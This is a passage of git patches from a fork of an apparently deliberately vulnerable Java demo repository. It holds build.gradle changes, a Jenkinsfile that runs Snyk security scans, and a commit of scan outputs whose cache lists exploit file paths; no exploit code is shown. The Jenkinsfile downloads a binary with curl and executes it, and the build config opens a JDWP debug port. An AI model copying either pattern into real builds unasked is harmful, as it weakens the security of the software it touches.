'-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006' - ] dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() } repositories { From 8a935e73bd3ab718d464d185f2241a8af0df8b6f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Wed, 21 Aug 2024 13:55:45 -0400 Subject: [PATCH 18/38] Update build.gradle --- build.gradle | 158 +++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 153 insertions(+), 5 deletions(-) diff --git a/build.gradle b/build.gradle index ca089e8a44..9b8da9a2b8 100644 --- a/build.gradle +++ b/build.gradle @@ -2,6 +2,7 @@ buildscript { ext { projectName = 'hyrax' projectVersion = version + buildNumber = System.env.BUILD_NUMBER ?: "1" arch = 'noarch' awaitilityVersion = '4.1.0' commonsCollection4Version = '4.4' @@ -25,6 +26,11 @@ buildscript { junitVersion = '5.10.1' testContainerVersion = '1.19.3' nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' + nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" + nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" + applicationDefaultJvmArgs = [ + "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006" + ] dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() } repositories { @@ -50,7 +56,8 @@ java { languageVersion = JavaLanguageVersion.of(17) } } - +ext.githash = 'git rev-parse --short HEAD'.execute().text.trim() +ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-") jacoco { toolVersion = "0.8.8" } @@ -59,7 +66,10 @@ repositories { mavenCentral() maven { url "${nexus}" } } - +checkstyle { + configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml") + toolVersion = "5.9" +} configurations.configureEach { resolutionStrategy.cacheChangingModulesFor 0, 'seconds' exclude module: "spring-boot-starter-tomcat" @@ -73,11 +83,25 @@ dependencies { implementation "org.springframework.boot:spring-boot-starter-jetty" implementation("org.springframework.boot:spring-boot-starter-webflux") implementation("org.springframework.boot:spring-boot-starter-oauth2-client") + // tag::actuator[] implementation "org.springframework.boot:spring-boot-starter-actuator" + // end::actuator[] implementation "org.springframework.boot:spring-boot-starter-security" implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' + constraints { + implementation("org.yaml:snakeyaml:${snakeYamlVersion}") { + because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857" + } + implementation("ch.qos.logback:logback-core:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + implementation("ch.qos.logback:logback-classic:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + } implementation("org.springframework.boot:spring-boot-starter-cache") implementation "org.springframework.boot:spring-boot-starter-cache" + // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this implementation "org.springframework:spring-tx" implementation "org.codehaus.janino:janino" implementation("com.xmatters:springbok:${springbokVersion}") { @@ -97,15 +121,19 @@ dependencies { implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}" implementation 'redis.clients:jedis:5.1.2' implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}" + // Websocket/STOMP implementation "org.springframework.boot:spring-boot-starter-websocket" implementation 'org.springframework:spring-messaging' + // Consul client library, may be used for service registration and Key/Value API implementation('com.ecwid.consul:consul-api:1.4.2') { exclude group: 'com.google.code.gson', module: 'gson' } implementation 'javax.xml.bind:jaxb-api:2.3.1' implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1' + // SMTP for email bounce back implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}" implementation 'com.sun.activation:javax.activation:1.2.0' + // https://cloud.google.com/java/docs/bom implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}") implementation 'com.google.code.gson:gson' implementation 'com.google.guava:guava' @@ -117,7 +145,7 @@ dependencies { testImplementation "org.mockito:mockito-inline:${mockitoVersion}" testImplementation "org.awaitility:awaitility:${awaitilityVersion}" testImplementation "com.github.codemonstur:embedded-redis:1.0.0" - + // Needed for the HyraxAuthApiTestController and its associated configuration. testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1') testImplementation(platform('org.junit:junit-bom:5.10.2')) testImplementation('org.junit.jupiter:junit-jupiter') @@ -132,5 +160,125 @@ dependencies { "org.testcontainers:testcontainers:${testContainerVersion}", ) } - - +sonarqube { + properties { + property "sonar.projectVersion", version.split('-')[0] + property "sonar.language", "java" + property "sonar.scm.disabled", "true" + property "sonar.core.coveragePlugin", "Jacoco" + } +} +test { + // Checkstyle after test run + finalizedBy = [jacocoTestReport, check] + systemProperties = ["spring.profiles.active": "test, test-overrides"] + useJUnitPlatform() + testLogging { + exceptionFormat = 'full' + events "passed", "skipped", "failed", "standardOut", "standardError" + } +} +tasks.withType(JavaCompile).configureEach { + options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror' +} +bootRun { + gradle.taskGraph.whenReady { taskGraph -> + if (taskGraph.hasTask(bootRun)) { + def error = ''' +Standalone DEV is no longer supported. Please use dev in the cloud for local development. +To discourage further use of this function, you will be presented with a bad dad joke each time you run it! + +''' + try { + def response = 'curl https://icanhazdadjoke.com/'.execute().text + error += '*' * response.length() + error += '\n' + response + '\n' + error += '*' * response.length() + } catch (e) { + error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base' + } + throw new GradleException(error) + } + } +} +// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name, +// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains +// remotes/origin or origin/, since we don't care about that. +def sanitize = { input -> + return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); +} +def buildNumber = System.env.BUILD_NUMBER ?: "1" +def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim() +def githash = 'git rev-parse --short HEAD'.execute().text.trim() +def gitbranchTag = sanitize(gcpGitbranch) +def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}" +def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" +def dockerTag = "${dockerRepo}:${dockerTagShort}" +def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" +//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto +// other upstream callers that are unable to figure out this information on their own. +tasks.register('versionProp') { + onlyIf { true } + doLast { + new File("$project.buildDir/gcpBuildVersion.properties").text = """ +APPLICATION="hyrax" +VERSION=${project.version} +BUILD=${buildNumber} +BRANCH=${gcpGitbranch} +GIT_HASH=${githash} +TAG_FULL=${dockerTag} +TAG=${dockerTagShort} +TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} +BUILD_TYPE=${buildType} +""" + } +} +generateGitProperties.finalizedBy versionProp +jib { + from { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy" + } + to { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" + tags = ['latest', dockerTagShort] + } + container { + entrypoint = ["/entrypoint.sh"] + mainClass = "com.xmatters.cloudagent.Application" + ports = ['8083'] + containerizingMode = 'exploded' + environment = [ + SERVICE : "hyrax", + OTEL_JAVAAGENT_LOGGING: "application", + OTEL_JAVAAGENT_DEBUG : "false", + OTEL_METRICS_EXPORTER : "none", + JVM_MEMORY : "-XX:MaxRAMPercentage=50", + JVM_PARAMS : "-XshowSettings:vm -Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M", + JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2", + JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000", + HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user", + THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out", + LOG_HOME : "/var/log/xmatters/hyrax", + INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString() + ] + labels = [ + maintainer: "mustafar@xmatters.com", + app : "hyrax", + owner : "Mustafar", + version : "${version}", + role : "api" + ] + extraDirectories { + paths { + path { + from = file('docker/files') + into = '/' + includes = ['entrypoint.sh'] + } + } + permissions = [ + '/entrypoint.sh': '755' + ] + } + } +} From 379b0593215992d41213c63b5063b28713b14c61 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 4 Mar 2025 11:53:19 -0500 Subject: [PATCH 19/38] add jenkinsfile Dont want to lose this lol --- .vscode/settings.json | 3 +++ Jenkinsfile | 58 +++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 61 insertions(+) create mode 100644 .vscode/settings.json create mode 100644 Jenkinsfile diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 0000000000..51d0b5e836 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,3 @@ +{ + "snyk.allIssuesVsNetNewIssues": "All issues" +} \ No newline at end of file diff --git a/Jenkinsfile b/Jenkinsfile new file mode 100644 index 0000000000..8228dda0fe --- /dev/null +++ b/Jenkinsfile @@ -0,0 +1,58 @@ +pipeline { + agent any + + stages { + stage('Checkout') { + steps { + git branch: 'main', url: 'https://github.com/dollav/java-goof.git' + } + } + + stage('Build') { + steps { + sh 'mvn clean install -DskipTests' // Skip tests for a faster build, remove -DskipTests to run tests. + } + } + + stage('Download Snyk CLI') { + steps { + sh ''' + curl -Lo ./snyk https://downloads.snyk.io/cli/stable/snyk-linux-arm64 + chmod +x snyk + ls -la + ./snyk -v + ''' + } + } + + + stage('Snyk Scan') { + steps { + script { + withCredentials([string(credentialsId: 'SNYK_TOKEN', variable: 'API_TOKEN')]){ + sh """ + ./snyk auth $API_TOKEN + ./snyk test --all-projects + """ + } + } + } + } + + + stage('Publish') { + steps { + // Example: Publish to a Maven repository + // You'll need to configure your Maven settings and credentials + // sh 'mvn deploy' + echo 'Publish stage - configure as needed' + } + } + + } + post { + always { + cleanWs() // Clean the workspace after each build + } + } +} \ No newline at end of file From 1ff4106fcfcf6644f8a7e7148ea41c58118107ef Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 4 Mar 2025 11:57:16 -0500 Subject: [PATCH 20/38] test --- .dccache | 1 + .gradle/8.11.1/checksums/checksums.lock | Bin 0 -> 17 bytes .gradle/8.11.1/fileChanges/last-build.bin | Bin 0 -> 1 bytes .gradle/8.11.1/fileHashes/fileHashes.lock | Bin 0 -> 17 bytes .gradle/8.11.1/gc.properties | 0 .gradle/8.8/checksums/checksums.lock | Bin 0 -> 17 bytes .../8.8/dependencies-accessors/gc.properties | 0 .gradle/8.8/fileChanges/last-build.bin | Bin 0 -> 1 bytes .gradle/8.8/fileHashes/fileHashes.bin | Bin 0 -> 18547 bytes .gradle/8.8/fileHashes/fileHashes.lock | Bin 0 -> 17 bytes .gradle/8.8/gc.properties | 0 .../buildOutputCleanup.lock | Bin 0 -> 17 bytes .gradle/buildOutputCleanup/cache.properties | 2 + .gradle/vcs-1/gc.properties | 0 .snyk | 8 + as.json | 0 boutput.json | 507 + build/reports/problems/problems-report.html | 663 + index.html | 1 + log4shell-goof/.dccache | 1 + log4shell-goof/log4shell-client/.dccache | 1 + .../log4shell-client/src/main/java/.dccache | 1 + .../log4shell-client/test-vuln.json | 90 + .../test-vuln.json--fail-on=high | 18 + .../test-vuln.json--fail-on=patchable | 90 + .../test-vuln.json--fail-on=upgradable | 90 + log4shell-goof/log4shell-server/.dccache | 1 + log4shell-goof/test/snyk.html | 1600 + output.json | 65575 ++++++++++++++++ output.txt | 15 + output2.json | 12 + script.sh | 85 + snyk.html | 828 + snyk.yaml | 5 + test-command.json | 1421 + test.json | 511 + test.sh | 85 + test2.json | 108 + todolist-goof/.dccache | 1 + todolist-goof/output.json | 47 + todolist-goof/todolist-core/.dccache | 1 + todolist-goof/todolist-web-struts/.snyk | 7 + todolist-goof/todolist-web-struts/json.json | 37955 +++++++++ todolist-goof/todolist-web-struts/snyk.yaml | 5 + todolist-goof/todolist-web-struts/test.json | 2 + todolist-goof/todolist-web-struts/test.sarif | 7412 ++ todolist-goof/todolist-web-struts/test.text | 799 + 47 files changed, 117948 insertions(+) create mode 100644 .dccache create mode 100644 .gradle/8.11.1/checksums/checksums.lock create mode 100644 .gradle/8.11.1/fileChanges/last-build.bin create mode 100644 .gradle/8.11.1/fileHashes/fileHashes.lock create mode 100644 .gradle/8.11.1/gc.properties create mode 100644 .gradle/8.8/checksums/checksums.lock create mode 100644 .gradle/8.8/dependencies-accessors/gc.properties create mode 100644 .gradle/8.8/fileChanges/last-build.bin create mode 100644 .gradle/8.8/fileHashes/fileHashes.bin create mode 100644 .gradle/8.8/fileHashes/fileHashes.lock create mode 100644 .gradle/8.8/gc.properties create mode 100644 .gradle/buildOutputCleanup/buildOutputCleanup.lock create mode 100644 .gradle/buildOutputCleanup/cache.properties create mode 100644 .gradle/vcs-1/gc.properties create mode 100644 .snyk create mode 100644 as.json create mode 100644 boutput.json create mode 100644 build/reports/problems/problems-report.html create mode 100644 index.html create mode 100644 log4shell-goof/.dccache create mode 100644 log4shell-goof/log4shell-client/.dccache create mode 100644 log4shell-goof/log4shell-client/src/main/java/.dccache create mode 100644 log4shell-goof/log4shell-client/test-vuln.json create mode 100644 log4shell-goof/log4shell-client/test-vuln.json--fail-on=high create mode 100644 log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable create mode 100644 log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable create mode 100644 log4shell-goof/log4shell-server/.dccache create mode 100644 log4shell-goof/test/snyk.html create mode 100644 output.json create mode 100644 output.txt create mode 100644 output2.json create mode 100755 script.sh create mode 100644 snyk.html create mode 100644 snyk.yaml create mode 100644 test-command.json create mode 100644 test.json create mode 100755 test.sh create mode 100644 test2.json create mode 100644 todolist-goof/.dccache create mode 100644 todolist-goof/output.json create mode 100644 todolist-goof/todolist-core/.dccache create mode 100644 todolist-goof/todolist-web-struts/.snyk create mode 100644 todolist-goof/todolist-web-struts/json.json create mode 100644 todolist-goof/todolist-web-struts/snyk.yaml create mode 100644 todolist-goof/todolist-web-struts/test.json create mode 100644 todolist-goof/todolist-web-struts/test.sarif create mode 100644 todolist-goof/todolist-web-struts/test.text diff --git a/.dccache b/.dccache new file mode 100644 index 0000000000..2dfbd1e49a --- /dev/null +++ b/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/.snyk":[263,1709233923336.8115,"4d5ddb18a63b61551137b8f6c2a53c131b013c740e9811f6aa33f3915dd4cbd6"],"/Users/austindoll/Documents/GitHub/java-goof/index.html":[664,1709234730093.0112,"b4b1fd34388ac1f26eb24ebcaff6dbb1a68bf5fe408c038644f2f675380b9f3d"],"/Users/austindoll/Documents/GitHub/java-goof/pom.xml":[847,1707749068003.2305,"da6ee224cb97110767ecdfd388ff49d09c79cabb83148cbc3c2d00247a99d5a9"],"/Users/austindoll/Documents/GitHub/java-goof/snyk.html":[46685,1708959251167.5747,"430bcf566f778c2cdfa1c3f36a8b0e14e6e65c43caacf812db410839fe091ff4"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[813,1707749068003.1423,"e3ab9c5fd3179257a8c7aabd94eaea5eaa5da23a5a61a7395e06ec0d4d29093c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3dfea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,1707749068031.0234,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3acf8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c